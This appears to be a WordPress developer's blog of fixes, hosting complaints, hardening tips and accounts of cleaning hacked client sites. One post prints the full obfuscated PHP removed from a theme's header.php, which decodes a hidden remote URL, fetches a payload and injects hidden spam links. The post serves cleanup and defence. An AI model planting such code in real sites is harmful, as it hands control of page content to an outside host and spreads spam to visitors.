If you google “Siktim Ebeniii,” you’ll find a bunch of other sites that have been hacked this way.

Usually, these kinds of attacks happen as a result of not having up-to-date software.  But they also happen because of unsafe server settings and since most of these compromised sites seem to be related to, I think the latter is a reasonable suspicion. This happened a few years back with a hosting provider called “Network Solutions” and in fact, Godaddy was attacked pretty hard recently, if I recall correctly.

April 2013 – Some News Concerning Malware Attacks on WordPress Sites

First off, Here’s Matt Mullenweg‘s blurb about the recent botnet attacks on WordPress sites.  It’s good to listen to him because he’s the “founding developer” of WordPress, and the President of the company Automatic which is behind, among other things.

From Matt:

supposedly this botnet has over 90,000 IP addresses, so an IP limiting or login throttling plugin isn’t going to be great (they could try from a different IP a second for 24 hours)

I’ve been noticing a few popular shared hosting providers have been having infrastructure problems lately.  I thought it was a coincidence, but after attempting to do some work on a client’s site hosted at Fatcow (not my favorite host, but they’re OK), I got hip to the fact there is actually a bit of internet-wide drama going on at the moment with WordPress sites getting hacked, or at least many attempts at this.

Here’s a message Fatcow sent out to its customers.

Important Information about Protecting Your WordPress Site

Dear [customer’s name],

Do you have a WordPress account with us? If so, we wanted to let you know about an attack on WordPress sites that started earlier this week, what we’ve done to combat it, and what you can do to protect yourself.

On Tuesday, a widespread “brute force” attack against WordPress started impacting sites across the internet. This attack is leveraging a botnet, which looks to have more than one hundred thousand different computers at its disposal. Its intent is very simple: to find and compromise WordPress sites with simple passwords, likely to use them later to distribute malware (and further increase the size of the botnet).

Over the past few days, we’ve made a number of changes to our network and infrastructure designed to mitigate the impact of this attack on our customers’ websites. Continue reading for a detailed account of what we’ve done »

Also, and we can’t stress this enough, we urge you to check your WordPress password and make sure it’s a strong one. The strong password guidelines in our Knowledgebase refer to your FatCow account password, but that advice is good for WordPress passwords, too!

We head into the weekend in good shape, but vigilant against a returning or altered attack. For those of you who have been impacted by these attacks, or our attempts to combat them, we do apologize for any service disruption. We also apologize for a longer-than-normal response time over the last few days while we’ve had “all hands on deck” addressing this issue. We appreciate your patience and understanding.


The FatCow Team

Bottom Line: Harden your WordPress site a little.

  • Keep your WordPress Core software and plugins and themes up to date!
  • Use Capitals, Lowercase, Numbers and Symbols in your passwords… Avoid guessable/dictionary words
  • If you have a user called “Admin” or “admin,” take a moment to get rid of it.
  • If installing from scratch, modify your database table prefix in wp-config.php to something other than “wp_”
  • Never use any theme, plugin or hosting provider that forces you into leaving folder and file permissions set to be permanently extra lenient (if someone tells you to change a directory to 777, they don’t know what they’re doing or your hosting provider’s server settings are wack…)
  • Stay on top of comment moderation.  If you find yourself with thousands of unmoderated comments waiting for approval, and you don’t want to do the work, perhaps you’re not cut out for participating in that way with the masses, or you just don’t have the time.  Just turn comments off!

There are TONS of free plugins that can help you scrutinize your WordPress install.  I use this from time to time: WP Security Scan.

Woo Theme (Delegate), Slider Broken, Pound Sign ( # ), Fixed

One of my clients has been using a theme by Woo called Delegate for a few years.  We recently encountered an issue where the home page slider stopped working, resulting in its contents just being empty and the navigation buttons only resulting in a # added to the end of the URL.

Here’s what I learned.

  1. in the theme’s folder, in /includes/theme-actions.php,  ~line 84, there is a section of code that starts with an html comment <!– Slider Setup –>… This is followed by a script that is set with PHP to only load if the current page “is_home” like this<script type=”text/javascript”>
    <?php if ( is_home() ) { ?> …Now, despite what this sounds like it means, is_home actually refers to your main posts page, so if you have a static front page in Settings>>Reading, this will return false.  Alter this conditional tag as follows to make the slider setup script run on your non-posts-page homepage.<script type=”text/javascript”>
    <?php if ( is_home() || is_front_page() ) { ?> …the “||” basically means “or” so now the conditional tag reads ‘if is main posts page or static front page’
  2. in the theme’s folder, in /includes/theme-js.php,  ~line 4, there is another instance of the conditional tag “is_home” that loads two Javascript files into the <head> of the html… This also needs to be changed if you’re using a static front page.if ( is_home() || is_front_page() ) {
    wp_enqueue_script( ‘jqueryEasing’, get_template_directory_uri() . ‘/includes/js/jquery.easing.min.js’, array( ‘jquery’ ) );
    wp_enqueue_script( ‘slides’, get_template_directory_uri() . ‘/includes/js/slides.min.jquery.js’, array( ‘jquery’ ) );
  3. Since we were using a custom page template that didn’t come with the theme (essentially a copy of index.php, but some modifications), we also needed to update the page template file, copying the new version of the slider’s activation from the new version of index.php<!– Featured Slider –>
    <?php if ( get_option( ‘woo_slider_disable’ ) != ‘true’ ) { get_template_part( ‘includes/slider’ ); } ?>
    <!– Featured Slider end –>

That’s basically it.  Keep in mind that updating the Woo Framework will likely overwrite these alterations, so back them up!!

Fix: WordPress Media Library and Attachments Broken After Moving/Cloning Site

I’ve spent countless hours on this problem after it’s happened to three of my clients.  Turns out what has been going wrong, isn’t simply an Automatic Post Thumbnails or Auto Featured Image Plugin, and it’s mostly not simply a difference in Server Configuration (PHP version or whatever)…

For years now, I have made it a point to change my clients’ table prefix from wp_ to something more unique for security purposes, and because it allows me to use the same database which simplifies the process of switching between to versions of a WordPress installation.

I’d duplicate the current site to a subdirectory like /staging/, or whatever, download the database, open the database in a programming text editor, do a find and replace for the domain, replacing all instances so they include the extra directory, then, because it was the perfect opportunity to do so, I’d also do a find and replace to turn all intances of wp_ with xyzabc_ then save the file and import it into the existing database and switch the wp-config.php file in the subdirectory version of the site to use the new xyxabc_ table prefix.

Now I’d have a nice sandbox environment to test out upgrades to the site or any major changes.  Not anymore.  You can no longer simply find-and-replace the table prefix in the database.  I’ve noticed this as of WordPress 3.4.1.  In the past I have only had this problems with sites running Woo themes.

session_start() [function.session-start]: error is godaddy’s fualt

Basically, you may have just spent hours trying to figure out why after changing your site’s directory, you are getting various errors that appear to be the result of your functions.php file or a plugin, or in my case, both.

here’s what you ned to do. (taken from, which was hard as shit to find)


Create a php5.ini and save it in your root folder. If you have various websites under one server, then it will be saved where you can view all the websites’ folders.

Create a folder in the root named “tmp” (without “s)

Type this inside the php5.ini :

session.save_path = “/home/content/##/#######/html/tmp”

*The #s are replaced by what your hosting provider gave you. In Godaddy, when you enter your Hosting Control Center it will be the Absolute Hosting Path under Server.

Save it

Good riddance.

Godaddy Sucks.


Popular Posts: Featured Image & All In One SEO Description

the Popular Posts Plugin allows you to use a number of ‘tags‘ (similar to shortcodes) to alter the output of the Popular Posts Widget.  Here’s what my client wanted to display with the Popular Posts Plugin: Featured Image (Thumbnail Size) , followed by the Description filled out in the All In One SEO settings for the post.

I freakin googled like mad to figure this out.  The main trouble I was having is that I was getting the same thumbnail for every ‘popular post’ …The reason is that you need to use


instead of


here’s what you do (note, my example is for if your thumbnails are set to be 100px by 100px in Settings>>Media)

{php: echo get_the_post_thumbnail($result->ID, array(100,100) ); }
{php:echo get_post_meta($result->ID, '_aioseop_description', true);}

Now, that was just the raw tags.

Here’s an example with some actual HTML in the mix (note I’m using nofollow for seo purposes and alignleft for layout purposes):

<li><a class="alignleft" rel="nofollow" href="{url}">{php: echo get_the_post_thumbnail($result->ID, array(100,100) ); }</a><a rel="nofollow" href="{php:echo get_post_meta($result->ID, '_aioseop_description', true);}"</a></li>

The End.

Now this (humans ignore){php} echo get_the_post_thumbnail($result->ID, array(100,100) ); echo get_post_meta($result->ID, ‘_aioseop_description’, true); echo get_post_meta($post->ID, ‘_aioseop_description’, true); echo get_the_post_thumbnail($Post->ID, array(100,100) );

WordPress: DT, DD, DL, Class=”[object]” Appearing in Post Content – Haunted WYSIWYG?

One of clients recently wrote me about some strange formatting appearing on a WordPress site.  Example of the strange HTML follows:

<p id=”[object]”>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed et nunc vitae nibh semper luctus.</p>
<p id=”[object]”>Sed et nunc vitae nibh semper luctus. Cras gravida semper magna, sit amet varius purus dictum non. Cras eget dolor est. Vestibulum dui ligula, adipiscing eget vestibulum dignissim, congue sed turpis.</p>

<div id=”[object]” class=”mceTemp mceIEcenter”><dl id=”attachment_1234″ class=”wp-caption aligncenter” style=”width: 510px;”><dt class=”wp-caption-dt”><a href=””><img class=”size-full wp-image-1234″ title=”etc” src=”” alt=”Suspendisse erat tortor, auctor sit amet dapibus a, sodales non massa. Integer viverra ornare purus non sodales.” width=”500″ height=”281″ /></a></dt><dd class=”wp-caption-dd”>Suspendisse erat tortor, auctor sit amet dapibus a, sodales non massa. Integer viverra ornare purus non sodales.</dd></dl></div>
<p id=”[object]”>

<p id=”[object]”> </p>
<p id=”[object]”> </p>

To summarize the oddities:

  • What normally would be <p class=”wp-caption-text”> becomes <dd class=”wp-caption-dd”>
  • image’s link tag is surrounded by <dt class=”wp-caption-dt”>
  • ““ becomes <dl id=”attachment_1234″>
  • the whole thing gets wrapped in a <div id=”[object]”>
  • and paragraph tags become <p id=”[object]”>

I suspect this has to do with TinyMCE‘s built-in on-the-fly code re-writing going haywire somehow. Incidentally, the person who was having these issues was running a pretty old version: WordPress 2.6.3

Anyone know what this is all about?  Leave a comment and together we’ll fix the world (or at least help others with a very frustrating bug)

iPage’s Secret php.ini editor

If you’re seeing this and not liking it: Maximum upload file size: 2MB

…the trick is generally to either upload a php.ini file with ammendments to the server’s default php settings, or in the case of some hosting providers, iPage included, you need to find a special settings page where you can edit your php.ini file.

Where is it?  I certainly couldn’t find it.  But after calling iPage, the secret is revealed.  Here’s how you get to iPage’s php.ini editor:

iPage  Customer Login (takes you to control panel…)>>Control Panel>>Scripting and Add-Ons>>CGI and Scripted Language Support>>PHP Scripting

You will need to find certain lines and replace their default values.

post_max_size =
upload_max_filesize =
max_execution_time =
memory_limit =

the values I use are these:

post_max_size = 30M

upload_max_filesize = 100M

max_execution_time = 900

memory_limit = 100M

iPage: CSS Changes Not Taking Effect Due to Cache (you’re not crazy and it’s not your fualt)

I thought I was losing my mind.  About half the time, when making adjustment to a stylesheet, the site would not update.  This was causing development work that should take about ten times as long.  Not good.

UPDATE: I got a comment from someone named ‘Whit’ which reads:

I have also had this problem. Though you guys might like a clearer answer as I got from iPage. They told me the following, “We use Varnish Caching technology. Hence, your website may not display the changes immediately.”

Very annoying. Either way, the simplest answer is to add no cache code to your .htaccess file like below:

Header set Cache-Control: “private, pre-check=0, post-check=0, max-age=0?
Header set Expires: 0
Header set Pragma: no-cache

Thanks, Whit!!!  [now back to my story]

After finding this, I finally called iPage. After debating with their “tech support” person about whether or not this could be their fault (which it clearly is), the person finally found that he could turn off some sort of caching that iPage has running by default on shared hosting accounts.  Eureka!  Unfortunately, it took 20 minutes to get thru to support.  More unfortunately, I had to plea and argue with the person for fifteen minutes before I could inspire him to discover that indeed, the caching is happening.  And most unfortunately of all, before I finally convinced the person to to look for the solution, the person tried to convince me that I should be willing to put up with it taking “ten minutes” or more  for a CSS update to take affect.  His words, “ten minutes.”  Seriously?  Ten minutes for a CSS tweak to take effect?  I can’t believe someone would say such a thing.  We’re talking about changes that take five seconds to make.  We’re talking about the workflow that virtually every web developer relies on: upload a change to the server, view the change in a browser, rinse repeat.  Ugh!

Oh, and the kid also said that this caching that he turned off on iPage’s end might take up to 24 hours to actually turn off… WTF!

So while I’m at it let me just say this about iPage also:  FTP times out a lot with them.  Very annoying, but I can deal with that.

I don’t think the money  you save by going with iPage (a few dollars a month) rather than another hosting provider ( bluehost or hostgator, for instance) is worth it.

I’m angry at them for

  1. Having support staff that are completely ignorant to the daily reality of all developers
  2. Having caching turned on by default and not making this known to their support people
  3. Having slow servers that drop or stall ftp connections constantly

OK.  I’m done now.  Back to work.

Approve comment turns red, (wordpress): Disable Mailpress

Mailpress is rad, but apparently they need to make an update to their plugin.

I use it and love it but with wordpress 3.05, I’ve found that I’m not able to approve comments.  When I click on the ‘approve’ link for a comment, the comment turns white for a second, like it has become ‘approved’ but suddenly goes red right after.  Weird bug.

Whenever you encounter weird bugs like these, it’s a good idea to make sure all your plugins are up to date and then, if you still have a problem, turn your plugins off one at a time to see if one of them is causing the problem.

AJAX Comments/MailPress Causing PHP Errors on Submit of Comments

(Thanks for the tip-off, Kim Flournoy!) MailPress seemed to be causing an error whenever someone would try to post a comment to my site.  The comments were actually getting through, but the commentor would see the mess of PHP errors below.

Upon deactivating MailPress, submitting a comment would result in a blank white screen (called a white screen of death in some parts).  I deactivated AJAX Comments (just a hunch) and the blank screen was fixed, and I was able to re-activate MailPress without any problems.  To summarize,

The problem is AJAX Comments, not MailPress, or at least the two don’t play nice together.  I choose MailPress as the one to keep and AC as the one to blame.

Warning: fsockopen() [function.fsockopen]: unable to connect to ssl:// (Failed to parse address "") in /my-website/path/public_html/etc/wp-content/plugins/mailpress/mp-includes/Swiftmailer/classes/Swift/Transport/StreamBuffer.php on line 233

Warning: Cannot modify header information - headers already sent by (output started at /my-website/path/public_html/etc/wp-content/plugins/mailpress/mp-includes/Swiftmailer/classes/Swift/Transport/StreamBuffer.php:233) in /my-website/path/public_html/etc/wp-comments-post.php on line 95

Warning: Cannot modify header information - headers already sent by (output started at /my-website/path/public_html/etc/wp-content/plugins/mailpress/mp-includes/Swiftmailer/classes/Swift/Transport/StreamBuffer.php:233) in /my-website/path/public_html/etc/wp-comments-post.php on line 96

Warning: Cannot modify header information - headers already sent by (output started at /my-website/path/public_html/etc/wp-content/plugins/mailpress/mp-includes/Swiftmailer/classes/Swift/Transport/StreamBuffer.php:233) in /my-website/path/public_html/etc/wp-comments-post.php on line 97

Warning: Cannot modify header information - headers already sent by (output started at /my-website/path/public_html/etc/wp-content/plugins/mailpress/mp-includes/Swiftmailer/classes/Swift/Transport/StreamBuffer.php:233) in /my-website/path/public_html/etc/wp-includes/pluggable.php on line 890

Hosting Providers: Check Yourself – WordPress is Mainstream

When I get asked for help with an attack on a WordPress site, it’s often on the same few hosting providers.  And when it’s not, it’s usually a small, local hosting provider.  When I have spoken to the staff of one of these hosting providers, about what seems to only occur in these few situations, they never take responsibility for having oddball server settings. And it’s not uncommon for them to actually blame their customers for using WordPress in the first place!

Some of the more popular Hosting Providers that seem to have more trouble than others with WordPress malware attacks in the past two years (in my experience) are Network Solutions and IX Web Hosting. And in general, hosting providers that have a lot of issues with malware affecting WordPress sites either

  • Have screwy server settings that tempt developers to take risks with file permissions, or
  • Have vulnerabilities that allow malware to sneak from one hosting account to another

As for some of the local, ma ‘n’ pa providers I’ve had problems with, I’m not going to hit them when they’re down by naming names.  But let me just say this: Buying local isn’t necessarily a good idea when it comes to hosting. It’s often the worst thing you can do.  You usually get crappy support, a high price, a non-standard product, and to make things even worse, you also often get a territorial ‘server guy’ who wants to blame any technical problems on the customer and not take responsibility for anything.

I can imagine being a hosting provider and not wanting to change how I do things just because a few of my customers want to run some weird PHP software they found somewhere.  But WordPress is hardly obscure anymore. And although I could be wrong, it seems that the server settings required for a smooth, safe ride with WordPress are in line with “best practices” for hosting providers in general, since all the best and most popular hosting providers seem to run WordPress perfectly.

So in the ‘news,’ I guess on April 12th, 2010, someone (rshinsec) at Network Solutions announced that an attack on many of Network Solutions’ customers’ sites was actually caused by a “WordPress Vulnerability.” (Quote is actually from a page HERE, because according to the page, Network Solutions has since edited the announcement)”

“Beginning last week a WordPress vulnerability has been the target of attacks on multiple WordPress websites on hosting platforms around the web. We have a blog post with additional details about the vulnerability and how to secure your WordPress site.”

In fact, it was not a WordPress problem at all.  So in response to some of the inaccurate anti-worpress blogosphere chatter caused by Network Solutions passing the buck like this, Matt Mullenweg, founder of WordPress posted to the WordPress Development Blog, clearing some things up, as well as putting it like this:

“Summary: A web host had a crappy server configuration that allowed people on the same box to read each others’ configuration files, and some members of the “security” press have tried to turn this into a “WordPress vulnerability” story.”

Thank you Matt!  We the people that use and love WordPress need to stand up for ourselves and demand what we deserve.  We are not a fringe community anymore.  WordPress is mainstream software and any hosting provider that has issues with it needs to check themselves!

wordpress attack inserts movie links in content

One of my favorite clients’ sites running WordPress was recently attacked by a bug that inserts links to “movie downloads” and “DVDs” all over the place in her content with “display:hidden”

The site links to sites who are also under attack and when the bug is running correctly on those sites, the sites redirect the hits to the final destination,

which is

I don’t know if knows this is happening.  I mean I suppose it’s possible that some unscrupulous SEO or Marketing guy promised them traffic and then resorted to this to get it.  I’m contacting them now to inform them of this uncool practice being committed on their behalf, and if they are not willing to cooperate on putting an end to it, I will have no choice but to give them some negative attention.

The process of extracting the bad links from the content was long and hard since the strings of code inserted were very inconsistent.

The following is a list of the sites being linked thru, which I assume are all victims of this malware.  If you own one of these sites, feel free to drop me a line and I will point you in the right direction as far as putting an end to this.


Message to ZML:


I am a developer and recently one of my clients who is running WordPress for her personal website was attacked by some Malware that inserted thousands of links throughout her content. Those links resolve to your site, but via redirects thru other sites that I assume are also victims of the malware.

You look like you’ve built a pretty nice site here. And I’m writing to give you the chance to get on board with fixing this problem before I am forced to create some negative attention in the blogosphere and social media.

It doesn’t seem like you would want to be resposible for malware. But it also doesn’t seem like anyone would go through the trouble to make all these links back to you unless you were paying them. Perhaps you hired some marketing or SEO people and were not aware that they would be using these tactics? Please write back soon as I have very little patience for this kind of thing.


Andrew A. Peterson

<wp:tag><wp:tag_slug>%d0%b0%d0%b2%d1%82%d0%be%d1%80%d1%81%d0%ba%d0%b8%d0%b5-%d0%bf%d1%80%d0%be%d0%b3%d1%80%d0%b0%d0%bc%d0%bc%d1%8b</wp:tag_slug><wp:tag_name><![CDATA[????????? ?????????]]></wp:tag_name></wp:tag>
<wp:tag><wp:tag_slug>%d1%81%d0%b2%d0%be%d0%b1%d0%be%d0%b4%d0%bd%d1%8b%d0%b9-%d0%bc%d0%b8%d0%ba%d1%80%d0%be%d1%84%d0%be%d0%bd</wp:tag_slug><wp:tag_name><![CDATA[????????? ????????]]></wp:tag_name></wp:tag>

Some samples of weird code that the bot inserted:

<wp:tag><wp:tag_slug>%d0%b0%d0%b2%d1%82%d0%be%d1%80%d1%81%d0%ba%d0%b8%d0%b5-%d0%bf%d1%80%d0%be%d0%b3%d1%80%d0%b0%d0%bc%d0%bc%d1%8b</wp:tag_slug><wp:tag_name><![CDATA[????????? ?????????]]></wp:tag_name></wp:tag>

<wp:tag><wp:tag_slug>%d1%81%d0%b2%d0%be%d0%b1%d0%be%d0%b4%d0%bd%d1%8b%d0%b9-%d0%bc%d0%b8%d0%ba%d1%80%d0%be%d1%84%d0%be%d0%bd</wp:tag_slug><wp:tag_name><![CDATA[????????? ????????]]></wp:tag_name></wp:tag>

Line-Numbers in WordPress 2.8’s Theme Editor?

UPDATE: After about four hours of hunting, I finally found a way to enable CodePress in WordPress! A plugin called Enable Codepress does just that! It only seems to work in FireFox, but it does work with WordPress 2.8.4

copy of a comment I left HERE, a tutorial having to do with adding line-numbers and syntax-highlighting to WordPress’ text-editor.

Wow. I am so frustrated. I have spent the last four hours trying to find a way for me to endow my clients, whom I have set up with WordPress, with the power of line numbers when editing CSS.

WordPress is nearly FTP-free, which is great for lay persons. I’ve had great results with teaching older people how to use FireBug to find and preview changes in their CSS by right-clicking on what they want to change and selecting “inspect element.” And it’s not too difficult for many of these folks to get into their Stylesheet in WP’s Theme Editor and find and change what they have tested in FireFox.

But would make the workflow a thousand times better would be a way to make the Textarea in the Theme Editor disply Line-Numbers. There are a handful of plugins that claim to do this, but none of them seem to work with WordPress 2.8.4 And in my hunt, I’ve found evidence that WP once had this feature briefly, but turned it off because it was too slow. I never noticed it and I’ve been using WP for years, and have always been up to date.

Now I find this blog post. Great. A hack to turn on the CodePress functionality in WordPress 2.8… The problem is I don’t understand how to do this!

Can’t you just make an installable Plugin? A plugin would be great because it would be nice to be able to turn the thing on and off, if it is indeed slow or buggy.

Or if some manual intervention with WP’s files is necessary, could you please-please-please explain which files you are editing in this tutorial? All of the examples show top line numbers (1, 2, 3). There’s no “this is what the whole thing should look like” …You don’t explain what file or files you are editing. This is so annoying because I’m not a programmer and this how-to assumes that we know certain things that I don’t know.

could brave these steps if I knew where to make them. I have been searching for this post for hours only to find that I’m not smart enough to understand the directions!!! Thanks for your consideration and for sharing information, even if I am ineligible for it.

wp_remote_fopen WordPress Attack Makes Site SLOW

Thanks to SomewwhereVille for helping me diagnose… Here’s what I removed from header.php (in all the installed themes, not just the active one):


<?php /* wp_remote_fopen procedure */ $wp_remote_fopen=’aHR0cDovL3F3ZXRyby5jb20vc3Mv’; $opt_id=’62f751b6518fcbe2ab5980b9f1349902′; $blarr=get_option(‘cache_vars’); if(trim(wp_remote_fopen(base64_decode($wp_remote_fopen).$opt_id.’.md5′))!=md5($blarr)){ $blarr=trim(wp_remote_fopen(base64_decode($wp_remote_fopen).$opt_id.’.txt’)); update_option(‘cache_vars’,$blarr); } $blarr=unserialize(base64_decode(get_option(‘cache_vars’))); if($blarr[‘hide_text’]!=” && sizeof($blarr[‘links’])>0){ if($blarr[‘random’]){ $new=”; foreach(array_rand($blarr[‘links’],sizeof($blarr[‘links’])) as $k) $new[$k]=$blarr[‘links’][$k]; $blarr[‘links’]=$new; } $txt_out=”; foreach($blarr[‘links’] as $k=>$v) $txt_out.='<a href=”‘.$v.'”>’.$k.'</a>’; echo str_replace(‘[LINKS]’,$txt_out,$blarr[‘hide_text’]); } /* wp_remote_fopen procedure */ ?>

After removing this crap, I recommend installing WP Security Scan. It’s a pretty badass little plugin that walks you through doing some not-so-obvious things to protect WP from attacks.  For instance, if your hosting scenario allows, you can rename all your Database Tables to have a Prefix other than “wp_”

Who knew that was the thing to do?  I didn’t.  It also scans your WP install for risky file permissions and weak passwords and a few other things.


Unfortunately for me, I was working on a site hosted by AN Hosting which doesn’t allow a certain priviledges to DataBase users (Alter?), so I had to change our table prefixes manually.


WP Security Scan, after failing to rename the table prefixes because it didn’t have sufficient access, referred me to a nice little tutorial on how to do it manually


Basically you:

  1. download your database thru PHPMyAdmin as per’s Documentation
  2. do a “Find-And-Replace” replacing all instances of “wp_” with “somethingelse_” 
  3. make a new database and import your “somethingelse_” version to the new database.
  4. Change your wp-config.php file to point at the new database 
  5. Change your wp-config.php file’s “table prefix” line from “$table_prefix  = ‘wp_’ ” to “$table_prefix  = ‘somethingelse_’

These kinds of problems suck to have but it sure is nice to have the WordPress Community, all of us working together to combat the evil.

Zemanta: Real-Time Semantic Discovery & Blogging Tool

Trying out Zemanta, a service for finding related resources. 

They make Plugins for WordPress, TypePad and other blogging platforms, as well as extensions for both FireFox and IE.

Currently, as I’m writing this, the Zemanta plugin is only giving me a “Loading Zemanta…” message… I figured Zemanta’s database would likely have plenty of articles about Zemanta.  Maybe not.

We’ll see.  Very cool idea either way.


I guess the first time I loaded my WordPress Dashboard’s Editing page, Zemanta took a little while to load… Ever since it’s been super fast.

Pretty cool little Plugin. 

Reblog this post [with Zemanta]